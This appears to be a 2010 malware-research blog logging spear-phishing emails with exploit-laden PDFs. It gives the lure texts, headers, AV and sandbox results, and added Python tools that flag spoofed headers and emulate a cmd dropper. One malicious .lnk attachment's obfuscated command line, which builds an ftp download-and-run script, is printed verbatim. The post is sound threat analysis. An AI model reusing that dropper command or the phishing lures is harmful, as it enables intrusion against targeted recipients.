Wednesday, January 13, 2010

Jan 13 CVE-2009-4324 Re: Project from spoofed [Redacted]@state.gov 13 Jan 2010 06:17:21 -0000

Download 116d92f036f68d325068f3c7bbf1d535 - Project.pdf as a password protected archive (please contact me if you need the password)

Update Jan. 22, 2010 - CW Sandbox analysis kindly provided by TarunKumar Singh (below)

-----Original Message-----
From: XXXXX (Real name here) [mailto:XXXXXX@state.gov]
Sent: 2010-01-13 1:17 AM
To: XXXXXX
Subject: Re: Project
Importance: High

Dear

I will bring your email to his attention at that time.

With regards,
Lesley Rich

Header:
Received: (qmail 6296 invoked from network); 13 Jan 2010 06:17:21 -0000
Received: from unknown (HELO state.gov) (115.92.107.178)
  by XXXXXXXXXXX
Received: from ¼òÌå²âÊÔ (unknown [192.168.7.110])
    by 192.168.7.110 (Coremail) with SMTP id _bJCALesoEAeAFMU.1
    for XXXXXXXXXXXXX Wed, 13 Jan 2010 14:17:15 +0800 (CST)
X-Originating-IP: [192.168.7.110]
Date: Wed, 13 Jan 2010 14:17:15 +0800
From: "=?GB2312?B?QnJlbW5lciwgU3VlIEw=?="
Subject: =?GB2312?B?UmU6IFByb2plY3Q=?=
To: XXXXXXXXXXXXXXXXXXX
X-Priority: 1
X-mailer: FastMail 1.5 [cn]
Mime-Version: 1.0
Content-Type: multipart/mixed;
    boundary="------=_Next_Part_0019055250.467"


Hostname: 115.92.107.178
ISP: LG DACOM Corporation
Organization: LG DACOM Corporation
Type: Cable/DSL
Country: Korea, Republic of  
State/Region: 11
City: Seoul
Latitude: 37.5664
Longitude: 126.9997
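The Received chain above carries the tells that give this message away before the attachment is even opened: the relay at 115.92.107.178 has no reverse DNS yet greets with HELO state.gov (a HELO name is whatever the client chooses to say), the X-Originating-IP is a private 192.168.x address behind a Coremail server, and the From and Subject headers are GB2312 encoded words from a mailer tagged [cn]. The following Python is an added example, not part of the original post: it runs those checks offline over a constructed copy of the headers (the recipient, the display name and the relay's self-reported hostname are placeholders; IPs, HELO, charset and X-mailer values are the ones shown above) and returns a report a gateway rule or a triage script could act on.

```python
"""Header anomaly checks for a spoofed-sender message (added example)."""
import ipaddress
import re
from email import message_from_string

# Constructed copy of the headers quoted above. Recipient, display name and
# the relay's self-reported hostname are placeholders; IPs, HELO, charset and
# X-mailer values are the ones shown in the post.
RAW_HEADERS = """\
Received: (qmail 6296 invoked from network); 13 Jan 2010 06:17:21 -0000
Received: from unknown (HELO state.gov) (115.92.107.178)
  by mx.example.invalid
Received: from placeholder-host (unknown [192.168.7.110])
    by 192.168.7.110 (Coremail) with SMTP id _bJCALesoEAeAFMU.1
    for <recipient@example.invalid>; Wed, 13 Jan 2010 14:17:15 +0800 (CST)
X-Originating-IP: [192.168.7.110]
Date: Wed, 13 Jan 2010 14:17:15 +0800
From: =?GB2312?B?W3JlZGFjdGVkXQ==?= <redacted@state.gov>
Subject: =?GB2312?B?UmU6IFByb2plY3Q=?=
X-Priority: 1
X-mailer: FastMail 1.5 [cn]
Mime-Version: 1.0
"""

# Two Received: styles appear above: qmail's "from rdns (HELO name) (ip)" and
# the Postfix/Coremail "from name (rdns [ip])" form.
QMAIL_RE = re.compile(r"from (?P<rdns>\S+) \(HELO (?P<helo>\S+)\) \((?P<ip>[\d.]+)\)")
POSTFIX_RE = re.compile(r"from (?P<helo>\S+) \((?P<rdns>\S+) \[(?P<ip>[\d.]+)\]\)")
ENCODED_WORD_RE = re.compile(r"=\?([^?]+)\?[BbQq]\?")


def parse_received(value):
    """Return {'helo', 'rdns', 'ip'} for one Received: header, or None."""
    for rx in (QMAIL_RE, POSTFIX_RE):
        m = rx.search(value)
        if m:
            return m.groupdict()
    return None


def analyze(raw_headers):
    """Run the spoofing checks and return a report dict."""
    msg = message_from_string(raw_headers)
    sender_domain = msg.get("From", "").rsplit("@", 1)[-1].strip("<> ").lower()
    report = {"sender_domain": sender_domain, "helo_spoof": [],
              "private_origin": None, "charsets": set(), "findings": []}

    # 1. A relay with no PTR record that greets with the From: domain. HELO is
    #    unauthenticated, so matching it to the spoofed domain costs nothing.
    for hop in filter(None, map(parse_received, msg.get_all("Received", []))):
        if hop["rdns"].lower() == "unknown" and hop["helo"].lower() == sender_domain:
            report["helo_spoof"].append(hop["ip"])
            report["findings"].append(
                f"{hop['ip']} has no reverse DNS but greets as {hop['helo']}, the From: domain")

    # 2. X-Originating-IP in RFC1918 space: the message was submitted from a
    #    LAN host behind the relay, not from a gateway of the claimed domain.
    origin = msg.get("X-Originating-IP", "").strip("[] ")
    if origin and ipaddress.ip_address(origin).is_private:
        report["private_origin"] = origin
        report["findings"].append(f"X-Originating-IP {origin} is a private address")

    # 3. Locale hints: charset of the RFC 2047 encoded words and the mailer's
    #    locale tag, compared with what the claimed sender domain would use.
    for name in ("From", "Subject"):
        report["charsets"].update(c.lower() for c in ENCODED_WORD_RE.findall(msg.get(name, "")))
    mailer = msg.get("X-mailer", "")
    if report["charsets"] - {"utf-8", "us-ascii"} or "[cn]" in mailer:
        report["findings"].append(
            f"encoded-word charsets {sorted(report['charsets'])} and X-mailer {mailer!r} "
            f"are unusual for mail originating from {sender_domain}")
    return report


if __name__ == "__main__":
    for line in analyze(RAW_HEADERS)["findings"]:
        print("-", line)
```

None of these checks needs DNS or network access, which is why they are cheap enough to run on every inbound message; a reverse-DNS or SPF lookup on the flagged relay would be the natural next step once a hop is reported.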

This file was already analyzed
 http://www.virustotal.com/analisis/ac3849e1c3ddf124f17c2ed7e8d3463fda2a37116d711a99b82c743c0c1a32ac-1263106258

http://www.virustotal.com/analisis/ac3849e1c3ddf124f17c2ed7e8d3463fda2a37116d711a99b82c743c0c1a32ac-1263938027
 File Project.pdf received on 2010.01.19 21:53:47 (UTC)
Result: 18/41 (43.90%)
a-squared 4.5.0.50 2010.01.19 Exploit.JS.Pdfka!IK
Authentium 5.2.0.5 2010.01.19 PDF/Expl.FO
BitDefender 7.2 2010.01.19 Exploit.PDF-JS.Gen
CAT-QuickHeal 10.00 2010.01.19 Expoit.PDF.FlateDecode
ClamAV 0.94.1 2010.01.19 Exploit.PDF-9757
Comodo 3640 2010.01.19 UnclassifiedMalware
DrWeb 5.0.1.12222 2010.01.19 Exploit.PDF.687
eSafe 7.0.17.0 2010.01.19 Win32.Pidief.H
F-Secure 9.0.15370.0 2010.01.19 Exploit.PDF-JS.Gen
GData 19 2010.01.19 Exploit.PDF-JS.Gen
Ikarus T3.1.1.80.0 2010.01.19 Exploit.JS.Pdfka
Kaspersky 7.0.0.125 2010.01.19 Exploit.JS.Pdfka.adn
McAfee-GW-Edition 6.8.5 2010.01.19 Heuristic.BehavesLike.PDF.Shellcode.Z
Microsoft 1.5302 2010.01.19 Exploit:JS/Heapspray
nProtect 2009.1.8.0 2010.01.19 Exploit.PDF-JS.Gen.C02
PCTools 7.0.3.5 2010.01.19 Trojan.Pidief
Symantec 20091.2.0.41 2010.01.19 Trojan.Pidief.H
TrendMicro 9.120.0.1004 2010.01.19 TROJ_PDFKA.AK
Additional information
File size: 149706 bytes
MD5   : 116d92f036f68d325068f3c7bbf1d535

 Vicheck.ca has this file under a different name already
https://www.vicheck.ca/md5query.php?hash=116d92f036f68d325068f3c7bbf1d535
kernel32, ExitProcess, Javascript obfuscation using unescape, Javascript obfuscation using unescape, Javascript possible obfuscation using unescape, PDF Exploit call to media.newPlayer

Wepawet
http://wepawet.iseclab.org/view.php?hash=116d92f036f68d325068f3c7bbf1d535&type=js
File Project.pdf
Analysis Started 2010-01-19 14:15:12
Report Generated 2010-01-19 14:16:24
Jsand 1.03.02 benign


Here is CW Sandbox analysis kindly provided by TarunKumar Singh


Created Files...
  • File: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1.exe
  • File Type: file
  • Source File Hash: 88fd19e48625e623a4d6abb5d5b78445
  • Creation/Distribution: CREATE_ALWAYS
  • Desired Access: FILE_ANY_ACCESS
  • Share Access: FILE_SHARE_WRITE
  • Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
  • Stored as: 88fd19e48625e623a4d6abb5d5b78445.exe
  • File: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ÄêÙR×´.pdf
  • File Type: file
  • Source File Hash: dc0a02619771b5d2d0887267c67b87a6
  • Creation/Distribution: CREATE_ALWAYS
  • Desired Access: FILE_ANY_ACCESS
  • Share Access: FILE_SHARE_WRITE
  • Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
  • Stored as: dc0a02619771b5d2d0887267c67b87a6.pdf

    Store Created Files Section...
    • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1.exe (36974 Bytes.)
    • Destination: 88fd19e48625e623a4d6abb5d5b78445.exe
    • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ÄêÙR×´.pdf (57536 Bytes.)
    • Destination: dc0a02619771b5d2d0887267c67b87a6.pdf

        Registrey Section...
  • Created Keys...
    • Key: HKEY_LOCAL_MACHINE\System\WSZXSGANXFJVAYSXYQGNXKQY

  • Open Keys...
    • Key: HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Acrobat Reader\8.0\ORO
    • Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

Jan. 13 CVE-2009-4324 The Chinese Navy's Budding Overseas Presence from trevor.yancey@gmail.com Wed, 13 Jan 2010 22:25:33 +0800

Download wm_2752.pdf as 214f524a7721501e561046a384ba4916 - wm_2752.zip (password protected archive, please contact me if you need it)

 Wed, 13 Jan 2010 22:25:33 +0800


From: Dean Cheng [mailto:trevor.yancey@gmail.com]
Sent: Wednesday, January 13, 2010 9:26 AM
To: XXXXXXXXXXXXXXXXXXX
Subject: The Chinese Navy's Budding Overseas Presence

As 2009 drew to a close, a senior Chinese naval officer raised the idea that the People's Republic of China (PRC) might be interested in establishing a permanent base in the Gulf of Aden area in support of anti-piracy missions. Admiral Yin Zhuo, a senior researcher at the Chinese People's Liberation Army Navy (PLAN) Equipment Research Center, suggested that such a base would facilitate a sustained Chinese presence in the region as part of ongoing anti-piracy efforts.
A base in the Gulf of Aden area would constitute the first formal Chinese overseas military base. It reflects China's growing overseas interests, as well as its expanding military capabilities, including a growing ability to operate far from its shores.
For the United States, the extended Chinese naval deployment in the Gulf of Aden, as well as discussion of the creation of a Chinese naval base in the region, should serve as a reminder that the U.S. Navy will encounter the PLAN more and more--and not solely in the Taiwan Straits, South China Sea, and other waters off China's coast. Given the global nature of China's economic interests, it is inevitable that the Chinese military will also have a more global presence. Nor is there anything that the United States can reasonably do to prevent this.
Rather than trying to forestall the inevitable, U.S. policymakers should recognize the Chinese competitive potential and stay ahead of the game even as the U.S. tries to manage China's emergence to its own advantage. This will entail three key initiatives.
Please find the attached for more detail. Should you have any question, let me know.
Best Regards,
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
I guess someone got carried away with the paste command (M)

Monday, January 11, 2010

Jan 11 CVE-2009-0927 CVE-2008-2992 China and Human Rights from jnfrlews@yahoo.com 2010.01.12 06:24:41 (UTC)

Download ChinaHR.pdf as AAF477AF8CFB73C6BD9945C5BE403FE9-ChinaHR.zip (password protected, please contact me for the password)

Details: AAF477AF8CFB73C6BD9945C5BE403FE9 - ChinaHR.pdf



From: Jennifer Lewis [mailto:jnfrlews@yahoo.com]
Sent: Monday, January 11, 2010 10:32 PM
To: XXXXXXXXXXXX
Subject: China and Human Rights

China's lack of political freedoms
Opinion towards China brings mixed agendas
China's poor attempt to deflect attention
Resentment of Chinese economic policy not benefiting locals
Lack of international unity, despite statements by media and world leaders
China's actions fuels the very thing it says it tries to fight
China and Africa; concerns over rights and exploitation
More information...
File ChinaHR.pdf received on 2010.01.12 06:24:41 (UTC)
The message sender was jnfrlews@yahoo.com
The message originating IP was 68.142.206.41
The message recipients were XXXXXXXXXXXXX
The message was titled China and Human Rights
The message date was Mon, 11 Jan 2010 19:31:56 -0800 (PST)
The message identifier was <54825.40062.qm@web113916.mail.gq1.yahoo.com>
attach/5963841_3X_PM5_EMS_MA-PDF__ChinaHR.pdf: Infected: Exploit.Win32.Pidief.bxf [AVP]


Virustotal
http://www.virustotal.com/analisis/b0c7da5ae8e22caeed88008c7847927a19fec7dd659746f6a124b08e3f95547b-1263277481

Result: 13/40 (32.5%)
AntiVir    7.9.1.134    2010.01.11    HTML/Silly.Gen
Antiy-AVL    2.0.3.7    2010.01.11    Exploit/Win32.Pidief
Authentium    5.2.0.5    2010.01.12    PDF/UtlPtf.B!Camelot
Avast    4.8.1351.0    2010.01.11    JS:Pdfka-ME
BitDefender    7.2    2010.01.12    Exploit.PDF-JS.Gen
eSafe    7.0.17.0    2010.01.11    PDF.Exploit
F-Secure    9.0.15370.0    2010.01.12    Exploit.PDF-JS.Gen
GData    19    2010.01.12    Exploit.PDF-JS.Gen
Kaspersky    7.0.0.125    2010.01.12    Exploit.Win32.Pidief.bxf
McAfee-GW-Edition    6.8.5    2010.01.12    Script.Silly.Gen
Sophos    4.49.0    2010.01.12    Troj/PDFJS-BX
Sunbelt    3.2.1858.2    2010.01.12    Exploit.PDF.Pidief (v)
VirusBuster    5.0.21.0    2010.01.11    JS.BOFExploit.Gen
Additional information
File size: 119239 bytes
MD5...: aaf477af8cfb73c6bd9945c5be403fe9


Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=aaf477af8cfb73c6bd9945c5be403fe9&type=js
Adobe getIcon: stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object (CVE-2009-0927)

Update January 18, 2010
jsunpack
Even better results were produced and submitted by Blake (thank you, Blake) using his jsunpack tool - see http://jsunpack.blogspot.com. Utilprintf CVE-2008-2992 was detected in addition to CollabgetIcon CVE-2009-0927.
jsunpack-n$ ./jsunpack-n.py ChinaHR.pdf -V
check line 1371
Processing ChinaHR.pdf
[malicious:10] [PDF] ChinaHR.pdf
       info: [decodingLevel=0] found JavaScript
       info: [decodingLevel=0] decoded 6269 bytes (./files/decoding_257729096ea832ff72e7365e34062d183d69f2fe)
       malicious: Utilprintf CVE-2008-2992 detected
       malicious: CollabgetIcon CVE-2009-0927 detected
       info: [decodingLevel=1] found JavaScript
       info: saved original parsed JavaScript to ./files/veryverbose_257729096ea832ff72e7365e34062d183d69f2fe
       info: Decoding option app.viewerVersion=8.0,    4012 bytes
       info: Decoding option app.viewerVersion= and app.viewerVersion=9.1,     0 bytes
       info: [decodingLevel=1] decoded 4012 bytes (./files/decoding_93aa0a7dc84a9b7ef6fe87912af5481a0d6a9f4d)
       suspicious: Warning detected //warning CVE-NO-MATCH Shellcode NOP len 9999 //warning CVE-NO-MATCH Shellcode NOP len 506 //warning CVE-NO-MATCH Shellcode NOP len 297 //warning CVE-NO-MATCH Shellcode NOP len 261833
       malicious: shellcode of length 565/295 (./files/shellcode_2b5537e1a69fa16a8c625e0087023c9506002d7e)
       malicious: shellcode of length 551/277 (./files/shellcode_e9f9df40fb0abdc9c6b119423800ca9d0583411c)
       info: [2] no JavaScript
       info: [file] saved ChinaHR.pdf to (./files/original_074517645ec0b7e50bc788910dda51c0e9dcd889)

[file] created ./files/decoding_257729096ea832ff72e7365e34062d183d69f2fe from ChinaHR.pdf
[file] created ./files/veryverbose_257729096ea832ff72e7365e34062d183d69f2fe from ChinaHR.pdf
[file] created ./files/decoding_93aa0a7dc84a9b7ef6fe87912af5481a0d6a9f4d from ChinaHR.pdf
[file] created ./files/shellcode_2b5537e1a69fa16a8c625e0087023c9506002d7e from ChinaHR.pdf
[file] created ./files/shellcode_e9f9df40fb0abdc9c6b119423800ca9d0583411c from ChinaHR.pdf
[file] created ./files/original_074517645ec0b7e50bc788910dda51c0e9dcd889 from ChinaHR.pdf



Jan 10 CVE-2009-4324 Adobe 0 Day with Backdoor:Win32/Bifrose.gen!E payload US-Taiwan Defense Industry Conference 2010 from jswang@gmail.com Sun, 10 Jan 2010 14:05:41 +0800

Download 9cc4133139cac1c774c0bf5476b2ed56 - US-Taiwan Defense Industry Conference 2010.pdf  (password protected archive, please contact me for the password)
sbcdrx.exe - 287EAC0F1F5E9223922EBFF3308F138F
sbcdrx.dat - EC8903129642D3AEF3348B68D17624B5
SysPr.prx - 4EF40422A092B40000C1FCA20A8D8E44

Details: 9cc4133139cac1c774c0bf5476b2ed56 - US-Taiwan Defense Industry Conference 2010.pdf

The message sender was jswang@gmail.com
The message originating IP was 168.95.4.102
The message recipients were XXXXXXXXX
The message was titled US-Taiwan Defense Industry Conference 2010
The message date was Sun, 10 Jan 2010 14:05:41 +0800
The message identifier was <004b01ca91ba$f1087b90$9301a8c0@testacb8580da5>
The virus or unauthorised code identified in the email is:
Bloodhound.Exploit.288

Sunday, January 10, 2010

Jan 10 CmdExploit 笑到哭出來ㄟ="To cool.. " from sun_yang_ming@yahoo.com Jan 10, 2010 5:43 AM

Here is an odd one. I am just posting it as is.



From: Y.M. SUN [mailto:sun_yang_ming@yahoo.com]
Sent: Sunday, January 10, 2010 5:43 AM
To: 1980connie@pchome.com.tw
Subject: 要冷靜~不能笑出來 [Stay calm~ don't laugh out loud]

Haha`

I saw it... [我抗到嚕....]

Super funny ((ha`

Laughed till I cried [笑到哭出來ㄟ]

_______________________________________
辣茩妏蚚閉湮⺍講捇誥蚘眊
http://cn.mail.yahoo.com


File attachment 笑到哭出來ㄟ.lnk

%COMsPec% /C seT L=O AS&ECHo %J%%L%08%G%^>f>S&eChO %J%aS08^>^>f>>S&ecHo %J%888^>^>F>>s&ecHo %j%Get X X.vbS^>^>F>>S&echO %j%bY^>^>f>>S&seT G=.CoM&ecHO %b%P%m%s:f>>s&eCHo %D%art x.VBS>>S&sEt M= -&Set b=fT&seT j=Echo &ReN s i.bAt&sEt D=St&I.bAt&
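The command line above is a small cmd.exe obfuscation trick. cmd expands every %VAR% reference across the whole line once, before any of the &-chained commands runs, and on a /C command line a reference to an undefined variable is left in place as literal text. So the echo commands write strings such as %J%%L%08%G% verbatim into the file S while the set commands beside them are still taking effect; only when S is renamed to i.bat and run as a batch file do the now-defined variables expand into the real commands. The following Python is an added example and not part of the original post: it is a deliberately minimal model of that expansion behaviour (an assumption about cmd.exe semantics sufficient for this sample, not cmd.exe itself) that replays the .lnk command in a virtual file system and shows what the batch file turns into, namely an ftp -s: script and a start of a .vbs, the staged download-then-execute pattern a shortcut attachment should never exhibit.

```python
"""Minimal model of cmd.exe variable expansion, used to untangle the .lnk
command line above (added example, not part of the original post). It
emulates only what that sample needs: %VAR% expansion (left as-is when
undefined on a /C command line, empty inside a batch file), ^ escapes,
& chaining, > and >> redirection, and the set / echo / ren builtins.
Anything else (ftp, start) is recorded, never executed.
"""
import re

# Constructed copy of the command line from the .lnk attachment above.
LNK_COMMAND = (
    "%COMsPec% /C seT L=O AS&ECHo %J%%L%08%G%^>f>S&eChO %J%aS08^>^>f>>S"
    "&ecHo %J%888^>^>F>>s&ecHo %j%Get X X.vbS^>^>F>>S&echO %j%bY^>^>f>>S"
    "&seT G=.CoM&ecHO %b%P%m%s:f>>s&eCHo %D%art x.VBS>>S&sEt M= -&Set b=fT"
    "&seT j=Echo &ReN s i.bAt&sEt D=St&I.bAt&"
)

VAR_RE = re.compile(r"%([^%]+)%")


def tokenize(line):
    """Split a line into (char, escaped) pairs; '^' quotes the next char."""
    out, i = [], 0
    while i < len(line):
        if line[i] == "^" and i + 1 < len(line):
            out.append((line[i + 1], True))
            i += 2
        else:
            out.append((line[i], False))
            i += 1
    return out


def split_commands(tokens):
    """Split on unescaped '&' and drop empty commands."""
    cmds, cur = [], []
    for tok in tokens:
        if tok == ("&", False):
            cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    cmds.append(cur)
    return [c for c in cmds if "".join(ch for ch, _ in c).strip()]


def split_redirect(tokens):
    """Separate command text from an unescaped > / >> redirection."""
    text, target, append, i = [], None, False, 0
    while i < len(tokens):
        ch, esc = tokens[i]
        if ch == ">" and not esc:
            append = i + 1 < len(tokens) and tokens[i + 1] == (">", False)
            i += 2 if append else 1
            name = []
            while i < len(tokens) and tokens[i][0] not in " \t":
                name.append(tokens[i][0])
                i += 1
            target = "".join(name)
        else:
            text.append(ch)
            i += 1
    return "".join(text), target, append


class CmdEmulator:
    def __init__(self):
        self.env = {}       # variable names are case-insensitive: keyed upper-case
        self.files = {}     # virtual file system, keyed lower-case
        self.external = []  # commands outside the model, e.g. ftp and start

    def expand(self, line, batch):
        def repl(m):
            val = self.env.get(m.group(1).upper())
            if val is not None:
                return val
            return "" if batch else m.group(0)   # batch: empty; command line: literal
        return VAR_RE.sub(repl, line)

    def run_line(self, line, batch):
        # cmd expands %VAR% across the whole line before any command in it runs,
        # so the set commands here do not affect the echo commands beside them.
        for cmd in split_commands(tokenize(self.expand(line, batch))):
            text, target, append = split_redirect(cmd)
            self.execute(text.lstrip(), target, append)

    def execute(self, text, target, append):
        word, _, rest = text.partition(" ")
        key = word.lower()
        if key == "set":
            name, _, value = rest.partition("=")
            self.env[name.strip().upper()] = value      # trailing spaces are kept
        elif key == "echo":
            if target:
                old = self.files.get(target.lower(), "") if append else ""
                self.files[target.lower()] = old + rest + "\r\n"
        elif key == "ren":
            src, _, dst = rest.partition(" ")
            self.files[dst.lower()] = self.files.pop(src.lower())
        elif key.endswith(".bat") and key in self.files:
            for batch_line in self.files[key].splitlines():
                self.run_line(batch_line, batch=True)
        else:
            self.external.append(text)


def deobfuscate(lnk_command):
    """Replay the .lnk command line through the model and return the emulator."""
    emu = CmdEmulator()
    body = lnk_command
    if body.lower().startswith("%comspec% /c "):   # %COMSPEC% is cmd.exe itself
        body = body[len("%comspec% /c "):]
    emu.run_line(body, batch=False)
    return emu


if __name__ == "__main__":
    emu = deobfuscate(LNK_COMMAND)
    print("i.bat as written:\n" + emu.files["i.bat"])
    print("script f handed to ftp -s:\n" + emu.files["f"])
    print("commands left to the real system:", emu.external)
```

Running it shows the two-stage structure directly: i.bat still contains the %J%, %L% and %b% references, the ftp script f is five lines (open, user, password, get of a .vbs, bye), and the only commands the model refuses to run are the ftp and start invocations. For detection purposes, a .lnk whose target is %COMSPEC% with a long /C argument full of set, echo and ^ escapes is the artefact to alert on, long before any of it executes.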


Header
Received: from [59.60.183.208] by web51104.mail.re2.yahoo.com via HTTP; Sun, 10 Jan 2010 02:43:24 PST
X-Mailer: YahooMailClassic/9.0.20 YahooMailWebService/0.8.100.260964
Date: Sun, 10 Jan 2010 02:43:24 -0800 (PST)
From: "Y.M. SUN"
Subject: =?utf-8?B?6KaB5Ya36Z2cfuS4jeiDveeskeWHuuS+hg==?=



http://www.robtex.com/ip/59.60.183.208.html#whois
inetnum: 59.56.0.0 - 59.61.255.255
netname: CHINANET-FJ
descr: CHINANET fujian province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: CA67-AP


Saturday, January 9, 2010

Malware naming

"What's in a name? That which we call a rose
By any other name would smell as sweet."

Romeo and Juliet (II, ii, 1-2) William Shakespeare
 
The Game of the Name: Malware Naming, Shape Shifters and Sympathetic Magic
by David Harley, Director of Malware Intelligence, ESET
 


Thursday, January 7, 2010

Jan 7 CVE-2009-4324 Us-J-India_strategic_dialogue from katieedouglas@yahoo.com Thu, 7 Jan 2010 10:07:18 -0800 (PST)

Update 1. One of the readers (thanks, Richard) reported that it is heavily obfuscated and exploits the CVE-2009-4324 (util.printd()) vulnerability, possibly among other things.

I don't know yet which CVE it is, but I will look into it later.


Download 12AAB3743C6726452EB0A91D8190A473 - Us-J-India_strategic_dialogue.pdf (password protected archive, you have to contact me for the password)
From: Katie Douglas [mailto:katieedouglas@yahoo.com]
Sent: Thursday, January 07, 2010 1:07 PM
To: XXXXXX XXXXXXXX
Subject: Us-J-India_strategic_dialogue

Dear XXXXXXXX,

In the new year there's a new strategy change. Please kindly find the attachment for your reference.

Best Regards,

Katie.

The message sender was katieedouglas@yahoo.com
The message originating IP was 76.13.13.79
The message recipients were xxxxxxxxxx
The message was titled Us-J-India_strategic_dialogue
The message date was Thu, 7 Jan 2010 10:07:18 -0800 (PST)
The message identifier was <219808.45632.qm@web114006.mail.gq1.yahoo.com>
The virus or unauthorised code identified in the email is:
attach/5963816_3X_PM5_EMS_MA-OCTET=2DSTREAM__Us=2DJ=2DIndia=5Fstrategic=5Fdialogue.pdf: Infected: Exploit.JS.Pdfka.axx [AVP]

 Virustotal
http://www.virustotal.com/analisis/67602c88edc029808f5d0907b0b0119193968db36e63ed7ce0a13dc324aaa560-1263210461
 File Us-J-India_strategic_dialogue.pdf received on 2010.01.11 11:47:41 (UTC)
Result: 2/40 (5%)
Kaspersky    7.0.0.125    2010.01.11    Exploit.JS.Pdfka.axx
Sophos    4.49.0    2010.01.11    Mal/PDFEx-D
Additional information
File size: 70437 bytes
MD5...: 12aab3743c6726452eb0a91d8190a473

Wepawet
 http://wepawet.cs.ucsb.edu/view.php?hash=12aab3743c6726452eb0a91d8190a473&type=js
File    Us-J-India_strategic_dialogue.pdf
MD5    12aab3743c6726452eb0a91d8190a473
Analysis Started    2010-01-11 04:08:14
Report Generated    2010-01-11 04:11:58
Jsand 1.03.02    benign :(

VMware - when the file is opened, it just crashes. No text to enjoy. I see no traffic on Wireshark, not yet.

to be continued..





Jan 7 CVE-2009-4324 Special Edition from okazaki1930@yahoo.co.jp Thu, 7 Jan 2010 16:21:46 +0900 (JST)

This post to be continued....


Download  日本の二大政党制.pdf as 55c503e5f160d58f830bb16d5fc1e09c-Special Edition.zip (password protected archive. Please contact me for the password)



-----Original Message-----
From: 岡崎 久彦 [mailto:okazaki1930@yahoo.co.jp]
Sent: Thursday, January 07, 2010 2:10 AM
To: XXXXXXX
Subject: 特別版再送 [Special Edition resend]

----- Original Message -----
From: Hisahiko Okazaki [mailto: okazaki1930@yahoo.co.jp]
Sent: Thursday, January 07, 2010 2:10 AM
To: XXXXX

Subject: resend Special Edition

The message sender was okazaki1930@yahoo.co.jp
The message originating IP was 124.83.212.30
The message recipients were XXXXXXXX
The message was titled 特別版再送 [Special Edition resend]
The message date was Thu, 7 Jan 2010 16:21:46 +0900 (JST)
The message identifier was <20100107072147.17625.qmail@web4210.mail.ogk.yahoo.co.jp>
The virus or unauthorised code identified in the email is:
>>> Possible MalWare 'Exploit/Acroread-CVE-2009-4324' found in
>>> '7913966_1003X_PA2_APDF__pdf_obj_50_0.js'. Heuristics score: 400

Previous scan on Jan 8, 2010 by someone else. Same md5 hash but different name.
http://www.virustotal.com/analisis/c09081111288172b10a4915c3ca3c917f614f0419a93407d8a4e96dc5da78563-1262913422

Two-party system in Japan
 日本の二大政党制.pdf
http://www.virustotal.com/analisis/c09081111288172b10a4915c3ca3c917f614f0419a93407d8a4e96dc5da78563-1263274446
Result: 16/41 (39.03%)
Antivirus     Version     Last Update     Result
a-squared    4.5.0.48    2010.01.12    Exploit.JS.Pdfka!IK
Antiy-AVL    2.0.3.7    2010.01.11    Exploit/JS.Pdfka
Avast    4.8.1351.0    2010.01.11    JS:Pdfka-UQ
BitDefender    7.2    2010.01.12    Exploit.PDF-JS.Gen
ClamAV    0.94.1    2010.01.12    Exploit.PDF-7067
Comodo    3552    2010.01.12    TrojWare.JS.Exploit.Pdfka.azg
F-Secure    9.0.15370.0    2010.01.12    Exploit.PDF-JS.Gen
GData    19    2010.01.12    Exploit.PDF-JS.Gen
Ikarus    T3.1.1.80.0    2010.01.12    Exploit.JS.Pdfka
Kaspersky    7.0.0.125    2010.01.12    Exploit.JS.Pdfka.azg
McAfee    5858    2010.01.11    Exploit-PDF.q.gen!stream
McAfee+Artemis    5858    2010.01.11    Exploit-PDF.q.gen!stream
McAfee-GW-Edition  Heuristic.BehavesLike.PDF.Shellcode.Z
PCTools    7.0.3.5    2010.01.12    HeurEngine.MaliciousExploit
Symantec    20091.2.0.41    2010.01.12    Bloodhound.Exploit.288
Additional information
File size: 1006594 bytes
MD5...: 55c503e5f160d58f830bb16d5fc1e09c


Tuesday, January 5, 2010

Jan. 5 CVE-2009-4324 Adobe 0 Day [NYTimes.com]Large Oil Spill Reported in China from nytimes2010@hotmail.com Tue, 5 Jan 2010 04:58:37 +0000



Download  CVE-2009-4324 samples (Password protected archives. Use the same password you used on the samples above or contact me for the password)

The message sender was nytimes2010@hotmail.com
The message originating IP was 65.55.34.86
The message recipients were XXXX@XXXXX.XXX
The message was titled [NYTimes.com]Large Oil Spill Reported in China
The message date was Tue, 5 Jan 2010 04:58:37 +0000
The message identifier was
The virus or unauthorised code identified in the email is:
Bloodhound.Exploit.288


From: TYTimes News [mailto:nytimes2010@hotmail.com]
Sent: Monday, January 04, 2010 11:07 PM
To: XXXXX@XXXX.XXX
Subject: [NYTimes.com]Large Oil Spill Reported in China


By DAVID BARBOZA
Published: January 5, 2010

SHANGHAI — A large oil spill in northwest China has heavily polluted a tributary of the Yellow River, and threatens to reach one of the country’s longest and most important sources of water.

China’s state-run news media said late Saturday that a “large amount” of diesel oil had leaked out of a pipeline last Thursday in Shaanxi Province.

...... 
•   NYTIMES.COM
•  For general help questions, please send us an e-mail using this form.
•  Comments or feedback about our Web site? Please send us an e-mail using this form.
•  For a possible correction, or to reach the Web site's editorial staff, you can send an e-mail.
•  For questions about posting comments on the site, there is an FAQ.
•  To reach Martin Nisenholtz, the Sr. V.P. of Digital Operations, you can send an e-mail.

________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.


